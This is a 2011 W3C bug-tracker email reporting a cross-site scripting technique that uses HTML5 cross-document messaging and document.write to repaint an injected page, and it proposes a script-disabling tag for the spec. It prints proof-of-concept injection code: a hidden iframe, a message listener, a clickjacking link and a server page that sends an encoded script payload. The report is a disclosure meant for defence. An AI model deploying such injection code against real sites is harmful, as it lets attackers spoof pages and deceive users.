- From: <bugzilla@jessica.w3.org>
- Date: Mon, 11 Apr 2011 10:02:41 +0000
- To: public-html@w3.org
http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469 Summary: Dynamic Cross-Site Scripting and Page Repainting Product: HTML WG Version: unspecified Platform: All OS/Version: All Status: NEW Severity: critical Priority: P2 Component: HTML5 spec (editor: Ian Hickson) AssignedTo: ian@hixie.ch ReportedBy: simon.young90@live.com QAContact: public-html-bugzilla@w3.org CC: mike@w3.org, public-html-wg-issue-tracking@w3.org, public-html@w3.org It has come to my attention in my studies that the addition of cross-document messaging in HTML5 allows a new, dynamic form of cross-site scripting to be developed, employing legitimate communications between injected content. By accompanying this with the document.wrtie() function, this could then be used to dynamically control “repaint” the entire content of a webpage vulnerable to code injection. A website could then be completely simulated by the XSS attack while still residing on a legitimate domain, a man-in-the-middle blue-pill esk attack. In this example, dynamically served code is appended to the original page, removing document.getElementsByTagName('html')[0].innerHTML will allow the page to be completely changed: >>>>>Injected Code: <iframe id="mommy" src="URL" style="visibility:hidden; height:0; width:0"></iframe> <script> window.addEventListener ("message", recvPayload, false); function recvPayload (event) { document.write(document.getElementsByTagName('html')[0].innerHTML + unescape(event.data)); } function requestPayload () { var frame = document.getElementById ("mommy"); frame.contentWindow.postMessage ("baby wants milk!", "*"); } </script> <a href="" onClick="requestPayload ()"> <!-- clickjacking --> >>>>Server Page: <script> window.addEventListener ("message", sendPayload, false); payload = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D"+ "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E"); function sendPayload (event) { event.source.postMessage (payload, event.origin); } </script> I propose the addition of a tag which, disables any script within its bounds perhaps along the lines of.. <plaintext></plaintext> this would allow web developers to disable areas of a page from using script, blocking XSS attacks. I would appreciate your thoughts on this. Many Thanks, Simon Young -- Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
Received on Monday, 11 April 2011 10:02:44 UTC